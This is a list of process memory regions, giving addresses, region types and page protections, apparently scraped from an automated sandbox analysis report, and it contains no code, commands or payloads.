21A24D2A000
heap
page read and write
4677000
heap
page read and write
7FFE38750000
trusted library allocation
page read and write
468A000
heap
page read and write
4677000
heap
page read and write
21A24AD0000
heap
page execute and read and write
21A24BA0000
heap
page read and write
21EC2413000
heap
page read and write
21EC2F09000
heap
page read and write
4677000
heap
page read and write
21A0AA4A000
heap
page read and write
4677000
heap
page read and write
47AF000
heap
page read and write
B6F0F7E000
stack
page read and write
4E80000
trusted library allocation
page read and write
21A0AAD0000
heap
page read and write
1C6ECCBF000
heap
page read and write
4677000
heap
page read and write
7FFE387D0000
trusted library allocation
page read and write
4677000
heap
page read and write
21A0CA82000
trusted library allocation
page read and write
1C6ECCE2000
heap
page read and write
21A24CE0000
heap
page read and write
1C6ECCBB000
heap
page read and write
48E1000
heap
page read and write
65AA32B000
stack
page read and write
1C6ECC74000
heap
page read and write
1C6ECCB4000
heap
page read and write
760000
heap
page read and write
BC2A0CC000
stack
page read and write
25C023F0000
heap
page read and write
7FFE385E0000
trusted library allocation
page read and write
21A24B99000
heap
page read and write
2CE0000
heap
page read and write
4695000
heap
page read and write
21A24A80000
trusted library allocation
page read and write
69374000
unkown
page readonly
21A24BCF000
heap
page read and write
1001F000
direct allocation
page read and write
21EC2F7E000
heap
page read and write
1C6ECC51000
heap
page read and write
21A0A9EA000
heap
page read and write
1C6ECCAF000
heap
page read and write
1C6ECCE5000
heap
page read and write
47AF000
heap
page read and write
21A0A9E4000
heap
page read and write
4677000
heap
page read and write
4677000
heap
page read and write
1C6ECCAF000
heap
page read and write
4677000
heap
page read and write
4677000
heap
page read and write
4677000
heap
page read and write
469A000
heap
page read and write
4677000
heap
page read and write
B6F143B000
stack
page read and write
1C6ECCC3000
heap
page read and write
CC28DCA000
stack
page read and write
396C0DC000
stack
page read and write
21A0A9BD000
heap
page read and write
4677000
heap
page read and write
21A24D20000
heap
page read and write
4679000
heap
page read and write
2CE4000
heap
page read and write
1C6ECCAF000
heap
page read and write
1C6ECBC0000
trusted library allocation
page read and write
21A0A99F000
heap
page read and write
1C6ECC90000
heap
page read and write
4E80000
trusted library allocation
page read and write
4E80000
trusted library allocation
page read and write
1C6ECCBF000
heap
page read and write
4677000
heap
page read and write
4677000
heap
page read and write
1C6ECCBD000
heap
page read and write
A54000
heap
page read and write
4677000
heap
page read and write
21A0A9EC000
heap
page read and write
1C6ECCBB000
heap
page read and write
4677000
heap
page read and write
21A0C6EA000
trusted library allocation
page read and write
B6F14BA000
stack
page read and write
1C6ECCC7000
heap
page read and write
21A24AA0000
trusted library allocation
page read and write
1C6ECCAF000
heap
page read and write
21A0AA5E000
heap
page read and write
688A000
heap
page read and write
2C1E000
stack
page read and write
21A24D15000
heap
page read and write
4677000
heap
page read and write
21A0A9FD000
heap
page read and write
7FFE385E6000
trusted library allocation
page read and write
B6F224E000
stack
page read and write
21A0C5D8000
trusted library allocation
page read and write
4683000
heap
page read and write
47B2000
heap
page read and write
4677000
heap
page read and write
21EC2F7E000
heap
page read and write
4677000
heap
page read and write
47B2000
heap
page read and write
4677000
heap
page read and write
21A0CA2A000
trusted library allocation
page read and write
1C6ECCBF000
heap
page read and write
21A1C5A0000
trusted library allocation
page read and write
4677000
heap
page read and write
21A24B8B000
heap
page read and write
4677000
heap
page read and write
1C6ECCB7000
heap
page read and write
4677000
heap
page read and write
B6F0C7E000
stack
page read and write
468A000
heap
page read and write
1C6ECC28000
heap
page read and write
4693000
heap
page read and write
21EC2FA5000
heap
page read and write
4677000
heap
page read and write
4677000
heap
page read and write
1C6ECCBB000
heap
page read and write
21EC2F4D000
heap
page read and write
4677000
heap
page read and write
4E80000
trusted library allocation
page read and write
396C1DE000
stack
page read and write
1C6ECCB7000
heap
page read and write
4677000
heap
page read and write
BC2A14E000
stack
page read and write
2CE4000
heap
page read and write
4677000
heap
page read and write
4677000
heap
page read and write
4677000
heap
page read and write
47B4000
heap
page read and write
1C6ECCBB000
heap
page read and write
B6F153D000
stack
page read and write
21A0AA0E000
heap
page read and write
5892000
heap
page read and write
4677000
heap
page read and write
1C6ECB60000
unclassified section
page readonly
21A0C782000
trusted library allocation
page read and write
65AAAFE000
stack
page read and write
1C6ECCBB000
heap
page read and write
4693000
heap
page read and write
21EC2F54000
heap
page read and write
4677000
heap
page read and write
5EA3000
heap
page read and write
4677000
heap
page read and write
21A0C5AE000
trusted library allocation
page read and write
21EC2F04000
heap
page read and write
7FFE38820000
trusted library allocation
page read and write
4685000
heap
page read and write
1C6ECC93000
heap
page read and write
4798000
heap
page read and write
6888000
heap
page read and write
21EC2502000
heap
page read and write
21A0C7C8000
trusted library allocation
page read and write
7FFE38800000
trusted library allocation
page read and write
7FFE38534000
trusted library allocation
page read and write
10000000
direct allocation
page read and write
7FFE38533000
trusted library allocation
page execute and read and write
21EC22D0000
heap
page read and write
21EC2513000
heap
page read and write
B6F183E000
stack
page read and write
21A0C796000
trusted library allocation
page read and write
2CE4000
heap
page read and write
7FFE38532000
trusted library allocation
page read and write
69340000
unkown
page readonly
4677000
heap
page read and write
47B4000
heap
page read and write
47B4000
heap
page read and write
4631000
heap
page read and write
4634000
heap
page read and write
47B2000
heap
page read and write
25C02477000
heap
page read and write
396C4FB000
stack
page read and write
4677000
heap
page read and write
4685000
heap
page read and write
1C6ECC3F000
heap
page read and write
B6F1137000
stack
page read and write
4E80000
trusted library allocation
page read and write
7CB000
stack
page read and write
B6F10BE000
stack
page read and write
4677000
heap
page read and write
21A24BBC000
heap
page read and write
4677000
heap
page read and write
7FFE38740000
trusted library allocation
page read and write
2CE4000
heap
page read and write
1C6ECCFD000
heap
page read and write
1C6EC9E0000
heap
page read and write
25C02704000
heap
page read and write
1C6ECCB3000
heap
page read and write
25C02710000
heap
page read and write
21EC2F00000
heap
page read and write
21A24A73000
trusted library allocation
page read and write
25C02470000
heap
page read and write
21EC2400000
heap
page read and write
4677000
heap
page read and write
2CE4000
heap
page read and write
21EC2F0C000
heap
page read and write
47B4000
heap
page read and write
21EC2494000
heap
page read and write
1C6ECCDE000
heap
page read and write
B6F133F000
stack
page read and write
4677000
heap
page read and write
21A0CA80000
trusted library allocation
page read and write
1C6ECCDE000
heap
page read and write
7DF425180000
trusted library allocation
page execute and read and write
2D2F000
stack
page read and write
7FFE38730000
trusted library allocation
page read and write
4634000
heap
page read and write
A40000
unclassified section
page readonly
4695000
heap
page read and write
1C6ECD02000
heap
page read and write
1C6ECC82000
heap
page read and write
47AF000
heap
page read and write
1C6ECCBF000
heap
page read and write
1C6ECCBF000
heap
page read and write
46F6000
heap
page read and write
21A0AA45000
heap
page read and write
21A0AC75000
heap
page read and write
2C79EDB0000
heap
page read and write
693AB000
unkown
page readonly
2CE4000
heap
page read and write
21A24AA0000
trusted library allocation
page read and write
1C6ECC0B000
heap
page read and write
21A0A9AD000
heap
page read and write
21A0CABF000
trusted library allocation
page read and write
4798000
heap
page read and write
21EC2F08000
heap
page read and write
21A24BD9000
heap
page read and write
7FFE387B0000
trusted library allocation
page read and write
396C67B000
stack
page read and write
4E80000
trusted library allocation
page read and write
B6F0EFE000
stack
page read and write
7FFE386EA000
trusted library allocation
page read and write
B6F0FFE000
stack
page read and write
7FFE386E1000
trusted library allocation
page read and write
4695000
heap
page read and write
4677000
heap
page read and write
6937C000
unkown
page readonly
4658000
heap
page read and write
4677000
heap
page read and write
1C6ECCBF000
heap
page read and write
B6F0DFE000
stack
page read and write
21A0AA2D000
heap
page read and write
4695000
heap
page read and write
4677000
heap
page read and write
B6F0CFE000
stack
page read and write
B6F12BF000
stack
page read and write
21A0CA7C000
trusted library allocation
page read and write
4693000
heap
page read and write
2C40000
heap
page read and write
4677000
heap
page read and write
7FFE38540000
trusted library allocation
page read and write
4677000
heap
page read and write
21A24A80000
trusted library allocation
page read and write
2C79EF90000
heap
page read and write
4677000
heap
page read and write
21A24D2F000
heap
page read and write
4677000
heap
page read and write
21A0C580000
heap
page execute and read and write
21A0C624000
trusted library allocation
page read and write
2C79EEE0000
heap
page read and write
21EC2E02000
heap
page read and write
21EC24E4000
heap
page read and write
1C6ECB70000
heap
page read and write
1C6ECCB1000
heap
page read and write
4677000
heap
page read and write
21A0AC50000
trusted library allocation
page read and write
6938E000
unkown
page read and write
65AAF7F000
stack
page read and write
4E80000
trusted library allocation
page read and write
506C000
heap
page read and write
1C6ECCB6000
heap
page read and write
46B1000
heap
page read and write
47B4000
heap
page read and write
21EC2F85000
heap
page read and write
21EC2340000
heap
page read and write
21EC2F9B000
heap
page read and write
47B4000
heap
page read and write
21A24A90000
trusted library allocation
page read and write
4677000
heap
page read and write
21EC2390000
heap
page read and write
7FFE387C0000
trusted library allocation
page read and write
469A000
heap
page read and write
4E70000
trusted library allocation
page read and write
21A24B47000
heap
page read and write
1C6ECCB7000
heap
page read and write
21EC2380000
unclassified section
page readonly
21A0AB60000
heap
page read and write
69341000
unkown
page execute read
7FFE3853D000
trusted library allocation
page execute and read and write
4677000
heap
page read and write
4E80000
trusted library allocation
page read and write
21A0A9EF000
heap
page read and write
4677000
heap
page read and write
47B5000
heap
page read and write
21A24CE7000
heap
page read and write
21A0A9FF000
heap
page read and write
4677000
heap
page read and write
4D31000
heap
page read and write
1C6ECCCC000
heap
page read and write
1C6ECC25000
heap
page read and write
7FFE387F0000
trusted library allocation
page read and write
2C79F265000
heap
page read and write
21A0C5B3000
trusted library allocation
page read and write
4677000
heap
page read and write
B6F16BD000
stack
page read and write
4677000
heap
page read and write
21A0AA1C000
heap
page read and write
21A24A80000
trusted library allocation
page read and write
7FFE38760000
trusted library allocation
page read and write
21A0AC45000
heap
page read and write
47A9000
heap
page read and write
21A0AC70000
heap
page read and write
2CCE000
stack
page read and write
4677000
heap
page read and write
BC2A1CF000
stack
page read and write
4677000
heap
page read and write
10001000
direct allocation
page execute read
21A0A960000
heap
page read and write
2CE4000
heap
page read and write
21A0AA1D000
heap
page read and write
47B4000
heap
page read and write
4677000
heap
page read and write
7FFE38790000
trusted library allocation
page read and write
4677000
heap
page read and write
21A0C5FC000
trusted library allocation
page read and write
21A0AA53000
heap
page read and write
21EC24A3000
heap
page read and write
4677000
heap
page read and write
21A0C6AB000
trusted library allocation
page read and write
21A0C591000
trusted library allocation
page read and write
49E0000
heap
page read and write
21A0C6F1000
trusted library allocation
page read and write
21A0AA25000
heap
page read and write
21A24AD7000
heap
page execute and read and write
4677000
heap
page read and write
21A24BAC000
heap
page read and write
47B4000
heap
page read and write
1C6ED402000
trusted library allocation
page read and write
56B1000
heap
page read and write
47AF000
heap
page read and write
47B2000
heap
page read and write
1C6ECCAF000
heap
page read and write
4677000
heap
page read and write
48E0000
heap
page read and write
21A0AA0F000
heap
page read and write
50A4000
heap
page read and write
1C6ECCBB000
heap
page read and write
21A24A80000
trusted library allocation
page read and write
A54000
heap
page read and write
48E1000
heap
page read and write
65AA6FF000
stack
page read and write
21EC24E0000
heap
page read and write
47B2000
heap
page read and write
1C6ECCB5000
heap
page read and write
4677000
heap
page read and write
1C6ECCBB000
heap
page read and write
21A24BC8000
heap
page read and write
47B2000
heap
page read and write
21A24BB2000
heap
page read and write
47B2000
heap
page read and write
7FFE38712000
trusted library allocation
page read and write
4677000
heap
page read and write
7FFE387A0000
trusted library allocation
page read and write
396C77E000
stack
page read and write
21EC2440000
heap
page read and write
4677000
heap
page read and write
21A0A984000
heap
page read and write
2C8E000
stack
page read and write
4611000
heap
page read and write
4677000
heap
page read and write
7FFE38650000
trusted library allocation
page execute and read and write
21A0AA4F000
heap
page read and write
7FFE38616000
trusted library allocation
page execute and read and write
4677000
heap
page read and write
21EC24EC000
heap
page read and write
1C6ECC6C000
heap
page read and write
1C6ECD13000
heap
page read and write
4677000
heap
page read and write
1C6ECCBB000
heap
page read and write
4677000
heap
page read and write
6938D000
unkown
page readonly
4695000
heap
page read and write
B6F163D000
stack
page read and write
4679000
heap
page read and write
7FFE38780000
trusted library allocation
page read and write
468A000
heap
page read and write
21A0AC30000
heap
page read and write
4677000
heap
page read and write
4677000
heap
page read and write
1C6ECCC8000
heap
page read and write
1C6ECCCF000
heap
page read and write
21A0A969000
heap
page read and write
4A80000
trusted library allocation
page read and write
21EC2F88000
heap
page read and write
4A5F000
heap
page read and write
2C79F260000
heap
page read and write
21A0C784000
trusted library allocation
page read and write
4798000
heap
page read and write
6889000
heap
page read and write
B6F17BD000
stack
page read and write
1C6ECC81000
heap
page read and write
1C6ECA50000
heap
page read and write
21EC2F7A000
heap
page read and write
1C6ECD1E000
heap
page read and write
47AF000
heap
page read and write
4798000
heap
page read and write
21EC2F8E000
heap
page read and write
47B2000
heap
page read and write
21A0A99D000
heap
page read and write
21A0AA32000
heap
page read and write
4677000
heap
page read and write
B6F09E2000
stack
page read and write
21A0AA42000
heap
page read and write
4A5F000
heap
page read and write
2E40000
direct allocation
page execute and read and write
B6F123C000
stack
page read and write
4677000
heap
page read and write
468A000
heap
page read and write
2CE4000
heap
page read and write
21A0A9A3000
heap
page read and write
1C6ECCBD000
heap
page read and write
1C6ECCB6000
heap
page read and write
4677000
heap
page read and write
21A0C5B1000
trusted library allocation
page read and write
B6F11B9000
stack
page read and write
51EC000
heap
page read and write
4677000
heap
page read and write
B6F1078000
stack
page read and write
4693000
heap
page read and write
B6F0D7E000
stack
page read and write
7FFE386D0000
trusted library allocation
page read and write
21A0CA7E000
trusted library allocation
page read and write
21EC248D000
heap
page read and write
46BD000
heap
page read and write
4693000
heap
page read and write
4677000
heap
page read and write
21A24D12000
heap
page read and write
1C6ECCC0000
heap
page read and write
4621000
heap
page read and write
46AD000
heap
page read and write
25C02700000
heap
page read and write
21EC2C70000
trusted library allocation
page read and write
B6F0E7D000
stack
page read and write
4890000
heap
page read and write
1C6ECC8A000
heap
page read and write
21A24CF4000
heap
page read and write
1C6ECCE9000
heap
page read and write
2CE4000
heap
page read and write
21A0AA0D000
heap
page read and write
25C02486000
heap
page read and write
21EC24F1000
heap
page read and write
1C6ECCDC000
heap
page read and write
4677000
heap
page read and write
2B70000
heap
page read and write
4677000
heap
page read and write
21A0ABF0000
trusted library allocation
page read and write
4677000
heap
page read and write
4798000
heap
page read and write
1C6ECCC8000
heap
page read and write
21EC2476000
heap
page read and write
21A0C69B000
trusted library allocation
page read and write
21A24A00000
heap
page execute and read and write
509C000
heap
page read and write
4685000
heap
page read and write
21EC2F06000
heap
page read and write
4677000
heap
page read and write
21EC2F02000
heap
page read and write
21A1C5FB000
trusted library allocation
page read and write
4677000
heap
page read and write
There are 595 hidden memdumps, click here to show them.